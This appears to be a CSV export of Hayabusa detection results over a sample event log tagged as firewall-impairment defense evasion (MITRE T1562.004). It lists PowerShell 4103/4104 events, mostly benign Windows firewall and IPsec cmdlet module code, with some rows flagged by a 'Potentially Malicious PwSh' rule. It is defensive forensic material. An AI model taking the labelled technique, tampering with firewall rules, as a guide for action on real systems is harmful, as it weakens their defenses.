$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.142 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.142 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.142 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.144 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.145 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.177 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.177 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.178 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.178 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.178 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.179 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.183 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.185 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.185 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.186 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.226 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" 